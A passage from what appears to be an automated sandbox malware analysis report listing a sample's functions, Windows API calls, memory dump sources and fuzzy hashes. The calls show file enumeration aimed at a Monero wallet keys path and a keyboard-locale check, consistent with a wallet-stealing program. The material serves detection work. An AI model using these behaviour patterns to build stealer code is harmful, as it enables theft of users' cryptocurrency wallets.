                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: dc2d03a51294fbd0edf0e4531a2a6fabe507ecfa1161819637e540b2f6eddb22
                        • Instruction ID: 4590a6f180c5d970f91ed2f9f884bf90e52b299b138b8368a9b92afdcafce5ed
                        • Opcode Fuzzy Hash: dc2d03a51294fbd0edf0e4531a2a6fabe507ecfa1161819637e540b2f6eddb22
                        • Instruction Fuzzy Hash: BE122F719111189BCB99FBA0CC96AEE737EAF56300F40419EB10B66091EF346F89CF95
                        Function 0069DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006B0C2E), ref: 0069DE5E
                        • StrCmpCA.SHLWAPI(?,006B14C8), ref: 0069DEAE
                        • StrCmpCA.SHLWAPI(?,006B14CC), ref: 0069DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0069E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 9497d0647876501bc0566cce13a547f30c024979cf84abd0ba8f1f4b557210cf
                        • Instruction ID: 97e306da83b2f053052211ba3f9f5359877d8f625f41c78f706a5c3ef73b0f61
                        • Opcode Fuzzy Hash: 9497d0647876501bc0566cce13a547f30c024979cf84abd0ba8f1f4b557210cf
                        • Instruction Fuzzy Hash: 23F1BF718211189ADB99FBA0CC95EEE737ABF15300F9141DEA40B62091EF346F8ACF55
                        Function 0069DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B14B0,006B0C2A), ref: 0069DAEB
                        • StrCmpCA.SHLWAPI(?,006B14B4), ref: 0069DB33
                        • StrCmpCA.SHLWAPI(?,006B14B8), ref: 0069DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0069DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: e5f900633ed296fc8c68f260862ee12e4a1fe4b99b600d06030c1680d2063ecf
                        • Instruction ID: 7bd7b2892b88e5096c86f20271a7a03531cb09ccee7981c95898d67505d543d7
                        • Opcode Fuzzy Hash: e5f900633ed296fc8c68f260862ee12e4a1fe4b99b600d06030c1680d2063ecf
                        • Instruction Fuzzy Hash: 729131B69001049BCF94FBB0DC569EE737EAB85300F40866DA90A96581EF34DF09CF96
                        Function 006A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,006B05AF), ref: 006A7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006A7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 006A7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006A7C62
                        • LocalFree.KERNEL32(00000000), ref: 006A7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 486f66aa988d463a4beb118401144ac0a63dc29537c7a08a0b995883c6531686
                        • Instruction ID: 9afe05209da1bbacd802bf43d1a79a7ef6d73c84d75ad9bf90d54c034276e93c
                        • Opcode Fuzzy Hash: 486f66aa988d463a4beb118401144ac0a63dc29537c7a08a0b995883c6531686
                        • Instruction Fuzzy Hash: A3417171941118AFDB64EB94DC99BEEB379FF45700F2042DAE40A62281DB342F85CFA5
                        Function 00A54879 Relevance: 10.4, Strings: 7, Instructions: 1670COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !.\~$Vmo$X%_y$`C>;$d_Pr$rW$zrnN
                        • API String ID: 0-4162817629
                        • Opcode ID: c5bd542d0c2430c20bea1ec1240cf8bb2be2378e55a0d8f390fb7c43d90f2704
                        • Instruction ID: 26f6f0c4e5727713ad90eaa08112a1919768671472cb4125a76a5603025dc3cc
                        • Opcode Fuzzy Hash: c5bd542d0c2430c20bea1ec1240cf8bb2be2378e55a0d8f390fb7c43d90f2704
                        • Instruction Fuzzy Hash: 49B238F3A082109FE304AE2DEC8567ABBE9EFD4720F16853DEAC5C7344E93558058796
                        Function 00A5E8C7 Relevance: 10.3, Strings: 7, Instructions: 1549COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: C7o$!%x7$+ tK$,%^~$?i$C.kw$]{_U
                        • API String ID: 0-2684099373
                        • Opcode ID: 83cec2cf1b0ad8538f8f38fd5b3a5d610bd2961765548482be28186ed2f8fd52
                        • Instruction ID: d85d570fc3896478ad8f1aaef4f93ad57c4a2e2402120d6fdc826d6f6888baaf
                        • Opcode Fuzzy Hash: 83cec2cf1b0ad8538f8f38fd5b3a5d610bd2961765548482be28186ed2f8fd52
                        • Instruction Fuzzy Hash: 37B206F390C6009FE704AE29EC8567AFBE5EF94720F1A893DEAC487344E63558418797
                        Function 0069E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006B0D73), ref: 0069E4A2
                        • StrCmpCA.SHLWAPI(?,006B14F8), ref: 0069E4F2
                        • StrCmpCA.SHLWAPI(?,006B14FC), ref: 0069E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: bd2b5ef18676113301338535fa1dbc55bccb37b262509f4f0ffca011adccbafa
                        • Instruction ID: 38c0b8f63df206bb7b8ff050dd7aabd0d5b3e96f3f6650938df74a4af5fc57a0
                        • Opcode Fuzzy Hash: bd2b5ef18676113301338535fa1dbc55bccb37b262509f4f0ffca011adccbafa
                        • Instruction Fuzzy Hash: 651283719101149BDB94FBA0DC96EEE733AAF55300F4041AEB50B96091EF34AF49CF96
                        Function 00A5CF42 Relevance: 9.0, Strings: 6, Instructions: 1516COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6twY$71no$B}$^bVC$iH9?$lt[?
                        • API String ID: 0-2218641548
                        • Opcode ID: 9f1b958df484b7e4d6beadf4e2e44357338513be9e1d13cb86a35f1f572aa15c
                        • Instruction ID: d033f89aa3de6250cb69c686df94204e7b74490d4b88ef3787ba6845bdf917d7
                        • Opcode Fuzzy Hash: 9f1b958df484b7e4d6beadf4e2e44357338513be9e1d13cb86a35f1f572aa15c
                        • Instruction Fuzzy Hash: 16A205F390C204AFE308AF2DEC4567AB7E5EF94720F1A493DEAC583744EA3559108697
                        Function 00699AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
                        • LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: Ni
                        • API String ID: 4291131564-3198496747
                        • Opcode ID: eb6a4721343d264f6d98f9c4ccae58de3d5a79b594e11595a6a6af99a5af1fe3
                        • Instruction ID: f4e1168f5bc9028f53c60cdab7221c0d7ce12a954d783a6161080f66165f89bd
                        • Opcode Fuzzy Hash: eb6a4721343d264f6d98f9c4ccae58de3d5a79b594e11595a6a6af99a5af1fe3
                        • Instruction Fuzzy Hash: BF11A2B4241208AFEB14CF64DC95FAA77B9FB89700F208159FD159B394C7B6A901DBA0
                        Function 00A59A60 Relevance: 7.8, Strings: 5, Instructions: 1595COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3{m$%#}$/fo$^m $p&6^
                        • API String ID: 0-3614866622
                        • Opcode ID: 1fca989013caa10908abde9b6144a294baee3c4bbea00d3e67449c23ab5decae
                        • Instruction ID: a539d833279f001be8f556a8cc3624d22db3ed4c582149d2fff0599d0f02dcc2
                        • Opcode Fuzzy Hash: 1fca989013caa10908abde9b6144a294baee3c4bbea00d3e67449c23ab5decae
                        • Instruction Fuzzy Hash: 92B229F3A0C2049FE304AE2DEC8567AF7E5EF94720F1A893DEAC4D3744E63558058696
                        Function 00A65310 Relevance: 7.8, Strings: 5, Instructions: 1571COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
